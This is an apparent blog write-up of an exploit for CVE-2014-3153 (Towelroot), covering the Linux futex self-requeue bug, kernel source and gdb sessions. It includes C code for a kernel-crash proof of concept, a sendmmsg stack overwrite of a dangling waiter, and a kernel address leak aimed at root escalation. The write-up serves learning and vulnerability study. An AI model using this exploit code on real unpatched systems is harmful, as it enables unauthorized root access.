Exploiting CVE-2014-3153 (Towelroot)

Exploiting CVE-2014-3153 (Towelroot)

Original text by Elon Gliksberg

Understanding The Kernel

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,
and that I did not truly grasp how some of it works, a “black-box”.

I’ve always been more than familiar with kernel and OS concepts,
but there’s a big gap from comprehending them as a user versus a kernel hacker.
I wanted to see code, not words.

In order to tackle that, I decided to take on a small kernel exploit challenge, and in parallel read Linux Kernel Development. Initially, the thought of reading the kernel’s code seemed a bit spooky, “I wouldn’t understand a thing”. Little by little, it wasn’t as intimidating, and honestly, it turned out to be quite easier than I expected.

Now, I feel tenfolds more comfortable to simply look something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

Kernel Exploitation

The book was really nice and all, but I wanted to get my hands dirty.
I searched for a disclosed vulnerability within the Linux kernel,
my plan being that I’d read its flat description and develop my own exploit to it.
A friend recommended CVE-2014-3153, also known as Towelroot, and I just went for it.
Back in the days, it was very commonly used in order to root Android devices.

Fast Userspace Mutex

The vulnerability is based around a mechanism called Futex within the kernel.
Futex being a wordplay on Fast userspace Mutex.

The Linux kernel provides futexes as a building block for implementing userspace locking.
A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.
The kernel is involved only to arbitrate the contended case.
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user- space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover only the terms and concepts related to the exploitation.
For a more profound insight about futexes, please reference man futex(2) and man futex(7).
I strongly suggest messing around with the examples in order to assess your understanding.

The futex() syscall isn’t typically used by “everyday” programs, but rather by system libraries such as pthreads that wrap its usage. That’s why the syscall doesn’t have a glibc wrapper like most syscalls do. In order to call it, one has to use syscall(SYS_futex, ...).

Due to the blocking nature of futex() and it being a way to synchronize between different tasks,
you’d notice how there’s a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general which we’d talk a lot about.

The first is something’s called a waiters list, also known as the wait queue.
This term refers to the blocking threads that are currently waiting for a lock to be released.
It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.
PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high- priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters among the futex’s waiters list.
A higher-priority task is guaranteed to get the lock faster than a lower-priority task.
Unlike non-PI operations, for instance.

This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority is not guaranteed to be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.
The way PI futexes are implemented is using what’s called in the kernel a plist, a priority-sorted list.
If you don’t know what it is, you could take a look here, though this image sums it up perfectly.

Priority List Image

All images are copied from Appdome.

Bug & Vulnerability

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.
First, we need to understand what’s a requeue operation in the context of futexes.
A waiter, blocking thread, that is contending on a lock, can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.
A waiter on a PI-futex cannot be requeued.
The bug itself is that there are no validations whatsoever on requeuing from a futex to itself.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from a non-PI source futex (uaddr) to a PI target futex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on. Eventually, what this bug gives us is a dangling waiter within the futex’s waiters list. The way the exploit does that is as follows:

1.FUTEX_LOCK_PILock a PI futex.
2.FUTEX_WAIT_REQUEUE_PIWait on a non-PI futex, with the intention of being requeued to the PI futex.
3.FUTEX_CMP_REQUEUE_PIRequeue the non-PI futex waiter onto the PI futex.
4.Userspace OverwriteSet the PI futex’s value to 0 so that the kernel treats it as if the lock is available.
5.FUTEX_CMP_REQUEUE_PIRequeue the PI futex waiter to itself.

And now we’ll understand why this results in a dangling waiter.

There are a lot of different data types within the Futex’s implementation code,
in order to cope with that I made somewhat of a summary of them to help me keep track of what’s going on. Feel free to use it as needed.

Step 1

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.

Step 2

In order to requeue a waiter from a non-PI –> PI futex, we first have to invoke FUTEX_WAIT_REQUEUE_PI on the non-PI futex, which in turn translates to the futex_wait_requeue_pi() function.
What this function does is take a non-PI futex and wait (FUTEX_WAIT) on it, and a PI-futex that it can potentially be requeued to with a FUTEX_CMP_REQUEUE_PI command later on.

static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
				 u32 val, ktime_t *abs_time, u32 bitset,
				 u32 __user *uaddr2)
	struct hrtimer_sleeper timeout, *to = NULL;
	struct rt_mutex_waiter rt_waiter; // <-- Important
	struct rt_mutex *pi_mutex = NULL;
	struct futex_hash_bucket *hb;
	union futex_key key2 = FUTEX_KEY_INIT;
	struct futex_q q = futex_q_init;
	int res, ret;

The function defines various local variables, the most important of which is the rt_waiter variable.
Unsurprisingly, this variable is our waiter.

struct rt_mutex_waiter {
    struct plist_node    list_entry;
    struct plist_node    pi_list_entry;
    struct task_struct    *task;
    struct rt_mutex        *lock;

It contains the lock that it waits on, it holds references to other waiters in the waiters list through the list_entry plist node, and on top of that it also has a pointer to the task that it currently blocks.

Needless to say that the locals are placed on the kernel stack, but also worth mentioning that because it’ll be crucial to understand in the near future.

Later on, it initializes the futex queue entry and enqueues it.

	q.bitset = bitset;
	q.rt_waiter = &rt_waiter;
	q.requeue_pi_key = &key2;
	/* Queue the futex_q, drop the hb lock, wait for wakeup. */
	futex_wait_queue_me(hb, &q, to);

Note how it sets the requeue_pi_key to the futex key of the target futex.
This is part of what allows us to self-requeue. We’ll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

  1. A wakeup occurs.
  2. The process is killed.

Step 3

Next up, futex_requeue() is called by the FUTEX_CMP_REQUEUE_PI operation in another thread in order to do the heavy lifting of actually requeuing the waiter. This is the vulnerable and most important function in the exploit. The function is fairly long and therefore I’m not going to review all of its logic, and rather only address the relevant parts.
I do encourage you to brief over it and try to get a hold of what it does.

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
             u32 __user *uaddr2, int nr_wake, int nr_requeue,
             u32 *cmpval, int requeue_pi)
    if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
        ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                &key2, &pi_state, nr_requeue);
	 * Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.
	 * Therefore the acquisition fails and 0 is returned.
	 * We will revisit futex_proxy_trylock_atomic below.
    head1 = &hb1->chain;
    plist_for_each_entry_safe(this, next, head1, list) {
        if (requeue_pi) {
            this->pi_state = pi_state;
            ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                            this->task, 1);
	 * this->rt_waiter points to the local variable rt_waiter
	 * in the futex_wait_requeue_pi from step 2.
	 * It is now added as a waiter on the new lock.

Let’s quickly glance at the code that requeues the waiter at rt_mutex_start_proxy_lock().

int rt_mutex_start_proxy_lock(struct rt_mutex *lock,
			      struct rt_mutex_waiter *waiter,
			      struct task_struct *task, int detect_deadlock)
	int ret;


	// Attempt to take the lock. Fails because lock is taken.
	if (try_to_take_rt_mutex(lock, task, NULL)) {
		return 1;

	ret = task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);

And inside task_blocks_on_rt_mutex().

static int task_blocks_on_rt_mutex(struct rt_mutex *lock,
				   struct rt_mutex_waiter *waiter,
				   struct task_struct *task,
				   int detect_deadlock)
	struct task_struct *owner = rt_mutex_owner(lock);
	struct rt_mutex_waiter *top_waiter = waiter;
	unsigned long flags;
	int chain_walk = 0, res;
	// Set the waiter's task and rt_mutex members.
	waiter->task = task;
	waiter->lock = lock;
	// Initialize the waiter's list entries.
	plist_node_init(&waiter->list_entry, task->prio);
	plist_node_init(&waiter->pi_list_entry, task->prio);

	/* Get the top priority waiter on the lock */
	if (rt_mutex_has_waiters(lock))
		top_waiter = rt_mutex_top_waiter(lock);

	// Add the waiter to the waiters list.
	plist_add(&waiter->list_entry, &lock->wait_list);

Now, rt_waiter of futex_wait_requeue_pi() is a node in the waiters list of our PI futex.

Step 4

Here we’ll set the userspace value of the futex, also known as the futex-word, to 0.
This is vital so that when the self-requeuing occurs, the call to futex_proxy_trylock_atomic() will succeed and wake the top waiter of the source futex, which is in fact the same as the destination futex. The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.

It might seem confusing at first but it’ll clear up in the next step.

Step 5

On this step, we’ll requeue the PI futex waiter to itself and invoke futex_requeue() once again.

if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
		 * Attempt to acquire uaddr2 and wake the top waiter. If we
		 * intend to requeue waiters, force setting the FUTEX_WAITERS
		 * bit.  We force this here where we are able to easily handle
		 * faults rather in the requeue loop below.
		ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
						 &key2, &pi_state, nr_requeue);

Let’s take a look at futex_proxy_trylock_atomic() this time.

 * Return:
 *  0 - failed to acquire the lock atomically;
 *  1 - acquired the lock;
 * <0 - error
static int futex_proxy_trylock_atomic(u32 __user *pifutex,
				 struct futex_hash_bucket *hb1,
				 struct futex_hash_bucket *hb2,
				 union futex_key *key1, union futex_key *key2,
				 struct futex_pi_state **ps, int set_waiters)
	struct futex_q *top_waiter = NULL;
	u32 curval;
	int ret;
	top_waiter = futex_top_waiter(hb1, key1);

	/* There are no waiters, nothing for us to do. */
	if (!top_waiter)
		return 0;

	/* Ensure we requeue to the expected futex. */
	if (!match_futex(top_waiter->requeue_pi_key, key2))
		return -EINVAL;

	 * Try to take the lock for top_waiter.  Set the FUTEX_WAITERS bit in
	 * the contended case or if set_waiters is 1.  The pi_state is returned
	 * in ps in contended cases.
	ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

	return ret;

Pay attention to how it ensures that the requeue_pi_key of the top_waiter is equal to the requeue’s target futex’s key. This is why we need to self-requeue, and why it wouldn’t be sufficient to just set the value of a different futex in userspace to 0 and requeue to it.

So the requirements for triggering the bug are:

  1. The target futex from the futex_wait_requeue_pi() remains.
  2. There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these terms is a self-requeue.

Other than that, basically all it does is call futex_lock_pi_atomic() and if the lock was acquired,
wake up the top waiter of the source futex.

static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
				union futex_key *key,
				struct futex_pi_state **ps,
				struct task_struct *task, int set_waiters)
	int lock_taken, ret, force_take = 0;
	u32 uval, newval, curval, vpid = task_pid_vnr(task);

	ret = lock_taken = 0;

	 * To avoid races, we attempt to take the lock here again
	 * (by doing a 0 -> TID atomic cmpxchg), while holding all
	 * the locks. It will most likely not succeed.
	newval = vpid;
	if (set_waiters)
		newval |= FUTEX_WAITERS;

	if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, 0, newval)))
		return -EFAULT;
	 * Surprise - we got the lock. Just return to userspace:
	if (unlikely(!curval))
		return 1;

The function attempts to atomically compare-and-exchange the futex-word. It compares it to 0 which is the value that signals the lock is free and exchanges it with the task’s PID.

This operation is unlikely to succeed because the user could’ve done it in userspace and avoid the expensive syscall, therefore the assumption is that the user wasn’t able to retrieve the lock in userspace and needed the kernel’s “help”. That’s why it would be a “surprise” in case it was able to get the lock.

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).
Because we overwrote the value in userspace (step 4), the function succeeds and wakes the waiter.

ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

When futex_requeue() wakes up the waiter, it sets the rt_waiter to NULL in order to signal futex_wait_requeue_pi() that the atomic lock acquisition was successful.

static inline
void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
			   struct futex_hash_bucket *hb)
	q->key = *key;


	q->rt_waiter = NULL; // Right here.

	q->lock_ptr = &hb->lock;

	// Start scheduling the task again.
	wake_up_state(q->task, TASK_NORMAL);

Its usage is seen here within futex_wait_requeue_pi().

/* Check if the requeue code acquired the second futex for us. */
	if (!q.rt_waiter) {
		 * Got the lock. We might not be the anticipated owner if we
		 * did a lock-steal - fix up the PI-state in that case.
	} else {
		 * We have been woken up by futex_unlock_pi(), a timeout, or a
		 * signal.  futex_unlock_pi() will not destroy the lock_ptr nor
		 * the pi_state.
		 // Removes the waiter from the wait_list.
		ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
		/* Unqueue and drop the lock. */

And as we can see, rt_mutex_finish_proxy_lock() is not being called since rt_waiter is NULL, and therefore the waiter is kept as-is within the waiters list.


We start off by locking a PI-futex. Then we simply requeue a thread to it which creates a waiter entry on the futex’s waiters list. Afterwards, we overwrite the futex-word with 0. Once we’ll requeue the waiting thread onto itself, the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.

Recap Image

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original rt_waiter is long gone and was destroyed by other function calls on the stack.

Bugged Waiter Image

Our waiter, a node in the waiters list, is now completely corrupted.

Building The Kernel

I won’t go too in depth as to how I built the kernel, since there are a milion of tutorials out there on how to do that. I’d merely state that I’ve been using an 3.11.4-i386 kernel for this exploit that I compiled on a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right gcc version for the according kernel version that I worked on. I compared the GCC releases with the Linux kernel version history and tried various versions that seemed to fit by release date. Ultimately gcc-5 was what did the job for me.

It would be virtually impossible to do all of that without building your own kernel.
The ability to debug the code and add your own logs within the code is indescribable.

For actually running the kernel, I’ve used QEMU as my emulator.


Now’s the time for the actual fun.

Eventually, our goal would be to escalate to root privileges.
The way we’d do that is by achieving arbitrary read & write within the kernel’s memory, and then overwrite our process’ cred struct which dictates the security context of a task.

struct cred {
	atomic_t	usage;
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */

The most fundamental members of cred are presumably the real uid and gid, but it also stores other properties such as the task’s capabilities and many other.

Although how would we go about it by solely having a wild reference to that waiter?
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities. Same applies here. We’d need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.
Let’s analyze it before going into the actual exploitation. Here’s the code.

#define CRASH_SEC 3

int main()
    pid_t pid;
    uint32_t *futexes;
    uint32_t *non_pi_futex, *pi_futex;

    assert((futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)) > 0);

    non_pi_futex = &futexes[0];
    pi_futex = &futexes[1];


    assert((pid = fork()) != -1);
    if (!pid)
        fwait_requeue(non_pi_futex, pi_futex, 0);
        puts("Child continues.");

    printf("Kernel will crash in %u seconds...\n", CRASH_SEC);

    frequeue(non_pi_futex, pi_futex, 1, 0);
    *pi_futex = 0;
    frequeue(pi_futex, pi_futex, 1, 0);


The flockfwait_requeue, and the frequeue functions are implemented in a small futex wrappers file that I’ve created for simplification and ease on the eyes.

futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)

We start off by allocating sizeof(uint32_t) * 2 of R/W memory which is our two futexes.
Mind the MAP_SHARED flag that is being passed to mmap call in order to signal that the memory needs to be shared among the main process and the process that is spawned from the fork() call.

Side-comment: In the actual exploit you’d see that I’m using pthreads rather than fork() which makes the code much clearer, and there’s no need to map a shared address space since all threads point to the same virtual address space.

  1. Locking the pi_futex. flock(pi_futex)
  2. Spawn a child process and call FUTEX_WAIT_REQUEUE_PI from non_pi_futex to pi_futex. assert((pid = fork()) != -1); if (!pid) { fwait_requeue(non_pi_futex, pi_futex, 0); puts("Child continues."); exit(EXIT_SUCCESS); }
  3. We only sleep to assure that the fwait_requeue of the child process had already been issued. Afterwards, we requeue the waiter to the pi_futex. sleep(CRASH_SEC); frequeue(non_pi_futex, pi_futex, 1, 0);
  4. Overwrite the userspace value of the pi_futex to 0. *pi_futex = 0;
  5. Self-requeue. frequeue(pi_futex, pi_futex, 1, 0);

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates (do_exit). What happens is that the kernel attempts to cleanup the process’ resources (mm_release), specifically the PI state list (exit_pi_state_list), and when it attempts to do so, it unlocks all the futexes that the process holds. During the process of releasing them, the kernel tries to unlock our corrupted waiter as well which causes a crash.

To be more accurate, it occurs here.

static inline struct rt_mutex_waiter *
rt_mutex_top_waiter(struct rt_mutex *lock)
	struct rt_mutex_waiter *w;

	w = plist_first_entry(&lock->wait_list, struct rt_mutex_waiter,
	BUG_ON(w->lock != lock); // <-- KERNEL BUG

	return w;

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, it’s lock member no longer points to the relating rt_mutex and therefore causes a crash.

Privilege Escalation

DOSing the system is pretty cool, but let’s make it more interesting by escalating to root privileges.

I intetionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.
If you do prefer to have the entire exploit available in hand, it can be found here.

Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.
A quick reminder, our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.

But how do we know which syscall to invoke?
Luckily for us, the kernel comes with a useful tool called checkstack.
It can be found within the source under scripts/checkstack.pl.

$ objdump -d vmlinux | ./scripts/checkstack.pl i386 | grep -E "(futex_wait_requeue_pi|sys)"

0xc11206e6 do_sys_poll [vmlinux]:                       932
0xc1120aa3 do_sys_poll [vmlinux]:                       932
0xc1527388 ___sys_sendmsg [vmlinux]:                    248
0xc15274d8 ___sys_sendmsg [vmlinux]:                    248
0xc1527b1a ___sys_recvmsg [vmlinux]:                    220
0xc1527c6b ___sys_recvmsg [vmlinux]:                    220
0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1529828 __sys_sendmmsg [vmlinux]:                    184
0xc15298fe __sys_sendmmsg [vmlinux]:                    184

The script lists the stack depth, size of stack frame, of each function within the kernel. This would help us in estimating which syscall we should use in order to write to the waiter’s address space.

We enforce two limitations on the system call we’re looking for.

  1. It is deep enough in order to overlap with our dangling rt_waiter.
  2. The local variable within the function that overlaps rt_waiter is controllable.

The syscalls sendmsgrecvmsg, and sendmmsg are the adjacent functions to futex_wait_requeue_pi in terms of stack usage.
That should be a good place to start. We’ll be using sendmmsg throughout the exploit.

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285

(gdb) set $waiter = &rt_waiter

Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979

(gdb) p $waiter
$12 = (struct rt_mutex_waiter *) 0xc78cbe2c

(gdb) p &iovstack
$11 = (struct iovec (*)[8]) 0xc78cbe08

(gdb) p sizeof(iovstack)
$13 = 0x40

(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)
$14 = 0x1 (True)

I set two breakpoints, at futex_wait_requeue_pi() and ___sys_sendmsg() in order to understand what arguments should we pass to the sendmmsg syscall so that rt_waiter is under our control.

When the breakpoint hits on futex_wait_requeue_pi(), I do nothing besides storing the address of rt_waiter in $waiter. When it hits on ___sys_sendmsg(), I check for the address of the local variable iovstack, which is of type struct iovec[8], and examine its size.

iovstack0xc78cbe08 — 0xc78cbe48

Proved futex_wait_requeue_pi:rt_waiter overlaps with ___sys_sendmsg:iovstack.

Let’s take a look at sendmmsg’s signature.

int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,
                    int flags);

struct mmsghdr
	struct msghdr msg_hdr;
	unsigned int msg_len;

struct msghdr
	void *msg_name;
	socklen_t msg_namelen;
	struct iovec *msg_iov; // <-- iovstack
	size_t msg_iovlen;
	void *msg_control;
	size_t msg_controllen;
	int msg_flags;

struct iovec
	void *iov_base;
	size_t iov_len;

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as sendmsg only that there’s mmsghdr that can contain multiple msghdr.
If you’re unfamiliar with the syscall, give it a read at man sendmmsg(2).

In order to invoke sendmmsg successfully, we’d need a pair of connected sockets that we can send the data to. It is very important to understand that we want ___sys_sendmsg() to block so that we can take advantage of the waiter’s corrupted state while it’s under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use SOCK_STREAM as our socket type which provides a reliable connection-based byte stream. This grants us the blocking capabilities we’ve talked about. On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.


int client_sockfd, server_sockfd;

void setup_sockets()
    int fds[2];

    puts(USERLOG "Creating a pair of sockets for kernel stack modification using blocking I/O.");

    assert(!socketpair(AF_UNIX, SOCK_STREAM, 0, fds));

    client_sockfd = fds[0];
    server_sockfd = fds[1];

    while (send(client_sockfd, BLOCKBUF, BLOCKBUFLEN, MSG_DONTWAIT) != -1)
    assert(errno == EWOULDBLOCK);

The function creates a pair of UNIX sockets of type SOCK_STREAM and then sends AAAAAAAA over the socket untill the call to send fails with EWOULDBLOCK as the errno. Note the MSG_DONTWAIT flag that makes the send return immediately instead of blocking.

Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that EWOULDBLOCK is in fact the reason the operation failed.

Next up, we’re ready for actually invoking our sendmmsg to overwrite rt_waiter. Exciting!

For the sake of overwriting the waiter’s list entries properly, which is what we’re interested in, we’d need to align the iovstack in kernelspace, which is the iovec in userspace accordingly.

#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))

struct mmsghdr msgvec;
struct iovec msg[7];

void setup_msgs()
    int i;

    for (i = 0; i < COUNT_OF(msg); i++)
        msg[i].iov_base = 0x41414141;
        msg[i].iov_len = 0xace;
    msgvec.msg_hdr.msg_iov = msg;
    msgvec.msg_hdr.msg_iovlen = COUNT_OF(msg);

In this function I setup the messages, the iovec, in the hope that it would overwrite the waiter’s struct once I call sendmmsg. Once again, I’ve placed two breakpoints at futex_wait_requeue_pi() and ___sys_sendmsg().

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
(gdb) cont

Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979

(gdb) fin
Run till exit from #0  ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
Program received signal SIGINT, Interrupt.
(gdb) p *$waiter
$26 = {
  list_entry = {
    prio = 0xace,
    prio_list = {
      next = 0x41414141,
      prev = 0xace
    node_list = {
      next = 0x41414141,
      prev = 0xace

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store rt_waiter’s address. Upon ___sys_sendmmsg I continue the execution until the function is about to exit. However, because the function is blocking, I have to interrupt the debugger with a ^C. Once the function blocks, it had already filled the iovstack. After I do that, I browse the waiter struct and I see that the overwrite occured just as I wanted it to.

Waiter Overwritten Image

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.

Let’s review this as a whole within the the exploit code.

void *forge_waiter(void *arg)
    puts(USERLOG "Placing the fake waiter on the dangling node within the mutex's waiters list.");

    assert(!fwait_requeue(&non_pi_futex, &pi_futex, 0));
    assert(!sendmmsg(client_sockfd, &msgvec, 1, 0));

int main()
    pthread_t forger, ref_holder;


    assert(!pthread_create(&forger, NULL, forge_waiter, NULL));

    assert(frequeue(&non_pi_futex, &pi_futex, 1, 0) == 1);

    assert(!pthread_create(&ref_holder, NULL, lock_pi_futex, NULL));

    pi_futex = 0;
    frequeue(&pi_futex, &pi_futex, 1, 0);

We’ve already reviewed setup_msg()setup_sockets(), and fwait_requeue() would block until the self-requeue is triggered. First thing when it exits, sendmmsg() is called to overwrite the waiter, which also blocks.

You could see that I create another thread called ref_holder which also attempts to lock pi_futex which in turns forms another waiter instance. The reason this is needed is because the state of the futex would get destroyed if there aren’t any contending waiters on the lock.

Kernel Infoleak

Our next goal would be to leak an address that would help us target the task_struct of our process which contains its cred so that we can overwrite it later to gain root privileges.

The way we go about doing it is using a fake waiter and when we’d attempt to lock the futex once again, another waiter would be added to the waiters list which would result in writing to the adjacent nodes which would be under our control. Once that happens, we’d be able to inspect the kernel address from userspace via the fake waiter list nodes.

#define DEFAULT_PRIO 120
#define THREAD_INFO_BASE 0xffffe000

struct rt_mutex_waiter fake_waiter, leaker_waiter;
pthread_t corrupter;

void link_fake_leaker_waiters()
    fake_waiter.list_entry.node_list.prev = &leaker_waiter.list_entry.node_list;
    fake_waiter.list_entry.prio_list.prev = &leaker_waiter.list_entry.prio_list;
    fake_waiter.list_entry.prio = DEFAULT_PRIO + 1;

void leak_thread_info()
    assert(!pthread_create(&corrupter, NULL, lock_pi_futex, NULL));

    corrupter_thread_info = (struct thread_info *)((unsigned int)leaker_waiter.list_entry.prio_list.next & THREAD_INFO_BASE);
    printf(USERLOG "Corrupter's thread_info @ %p\n", corrupter_thread_info);

Let’s first address what’s called a “Thread Info”.
thread_info is a thread descriptor that is held within the kernel and is placed on the stack’s address space. For each thread that we create using pthread_create() a new thread_info is generated in the kernel.

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	struct exec_domain	*exec_domain;	/* execution domain */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	int			preempt_count;	/* 0 => preemptable,
						   <0 => BUG */
	mm_segment_t		addr_limit;
	struct restart_block    restart_block;
	void __user		*sysenter_return;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */

The reason it interests us is because it’s relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process’ task_struct. Just to clarify, a new task_struct is also created for each thread.

In order to do the actual leak, we link together two fake waiters. One is named fake_waiter which is used for general list corruption, and the other is called leaker_waiter because its sole usage is to leak addresses through.

By linking I mean in practice that we set the previous node of the fake_waiter to be the leaker_waiter, and set its priority to be the default priority of a task plus one so that it’ll place itself after the leaker_waiter. Priority is a value that correlates to the process’ niceness.

Crafted Waiter Image

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call lock_pi_futex() on another thread so that a waiter is created which attempts to add itself into the list. Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to leaker_waiter.

New Waiter Image

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.

In order to target its thread_info, all we have to do is AND its address with THREAD_INFO_BASE. You can see that from current_thread_info()’s implementation, though that might vary across different architectures. Here’s the source for x86.

